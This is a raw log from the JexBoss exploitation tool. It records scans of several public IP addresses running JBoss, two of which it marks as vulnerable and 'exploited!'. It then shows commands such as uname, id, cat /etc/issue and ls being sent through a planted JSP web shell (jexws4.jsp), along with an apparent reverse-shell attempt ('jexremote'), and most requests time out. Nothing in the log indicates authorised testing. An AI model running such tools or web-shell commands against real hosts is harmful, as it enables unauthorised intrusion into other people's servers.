2018-03-04 14:55:12,221 (INFO): Checking Host: http://110.249.178.154:9000/
2018-03-04 14:55:18,740 (INFO): Server http://110.249.178.154:9000/: VULNERABLE
2018-03-04 14:55:40,873 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //web-console/Invoker
2018-03-04 14:56:02,387 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=uname+-a
2018-03-04 14:56:08,937 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=uname+-a
2018-03-04 14:56:15,465 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=uname+-a
2018-03-04 14:56:22,008 (WARNING): Disabling checking for updates.
Traceback (most recent call last):
  File "jexboss.py", line 751, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=uname+-a (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:56:28,574 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fissue
2018-03-04 14:56:35,116 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fissue
2018-03-04 14:56:42,673 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fissue
2018-03-04 14:56:45,678 (WARNING): Disabling checking for updates.
Traceback (most recent call last):
  File "jexboss.py", line 751, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fissue (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9de4d0>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)'))
2018-03-04 14:56:52,221 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=id
2018-03-04 14:56:59,760 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=id
2018-03-04 14:57:06,299 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=id
2018-03-04 14:57:12,840 (WARNING): Disabling checking for updates.
Traceback (most recent call last):
  File "jexboss.py", line 751, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=id (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:57:12,841 (INFO): Server http://110.249.178.154:9000/ exploited!
2018-03-04 14:57:19,403 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=
2018-03-04 14:57:26,968 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=
2018-03-04 14:57:33,500 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=
2018-03-04 14:57:41,043 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp= (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:57:48,595 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 14:57:55,139 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 14:58:02,701 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 14:58:09,237 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=cd (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:58:16,791 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=jexremote
2018-03-04 14:58:19,793 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9de390>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)')': //jexws4/jexws4.jsp?ppp=jexremote
2018-03-04 14:58:22,797 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9de190>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)')': //jexws4/jexws4.jsp?ppp=jexremote
2018-03-04 14:58:30,353 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=jexremote (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:58:37,904 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=ls
2018-03-04 14:58:45,464 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=ls
2018-03-04 14:58:52,001 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=ls
2018-03-04 14:58:59,568 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=ls (Caused by ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",))
2018-03-04 14:59:06,106 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=%3D192.168.1.43exit
2018-03-04 14:59:12,645 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=%3D192.168.1.43exit
2018-03-04 14:59:19,192 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=%3D192.168.1.43exit
2018-03-04 14:59:22,196 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=%3D192.168.1.43exit (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9de950>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)'))
2018-03-04 15:03:38,806 (WARNING): Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 15:03:41,852 (WARNING): Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9de690>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)')': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 15:03:48,399 (WARNING): Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ReadTimeoutError("HTTPConnectionPool(host='110.249.178.154', port=9000): Read timed out. (read timeout=6.0)",)': //jexws4/jexws4.jsp?ppp=cd
2018-03-04 15:03:51,403 (ERROR): Error contacting the command shell
Traceback (most recent call last):
  File "jexboss.py", line 775, in shell_http
    r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 321, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 668, in urlopen
    **response_kw)
  File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
MaxRetryError: HTTPConnectionPool(host='110.249.178.154', port=9000): Max retries exceeded with url: //jexws4/jexws4.jsp?ppp=cd (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f739e9deb50>, 'Connection to 110.249.178.154 timed out. (connect timeout=3)'))
2018-03-04 15:04:25,868 (INFO): Checking Host: http://101.254.175.102:8181/
2018-03-04 15:05:42,386 (INFO): Checking Host: http://42.96.170.222:8090/
2018-03-04 15:05:43,336 (INFO): Server http://42.96.170.222:8090/: VULNERABLE
2018-03-04 15:05:58,770 (INFO): Server http://42.96.170.222:8090/ exploited!
